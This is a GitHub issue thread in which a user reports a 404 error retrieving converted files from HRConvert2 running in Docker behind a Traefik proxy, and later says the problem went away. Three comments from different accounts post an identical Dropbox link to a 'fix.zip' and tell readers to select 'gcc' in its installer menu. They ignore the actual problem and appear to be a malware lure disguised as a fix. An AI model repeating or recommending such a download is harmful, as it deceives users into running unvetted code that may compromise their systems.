### ISSUE TITLE
404 when browser tries to retrieve converted file

### ISSUE THREAD

**Issue by RGBeezlebub** [zelon88/HRConvert2#83]
First off, thank you for the fantastic project!

My browser was getting a 404 error when accessing the converted file.

My build is using the latest docker image and is behind a Traefik v3.0 reverse proxy. The reverse proxy is functioning, but I've noticed that the /etc/www directory is missing inside the container, and the container appears to be using nginx to host the site. I've already checked the container for logs or the config to see if I needed to add something like a trusted host to the config, but I couldn't find anything. 

I would greatly appreciate any help you can give me!

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by RGBeezlebub** [comment]
Nevermind! I dont know what I did differently but I must have done something silly when I was troubleshooting. I can successfully download converted files. Thanks!
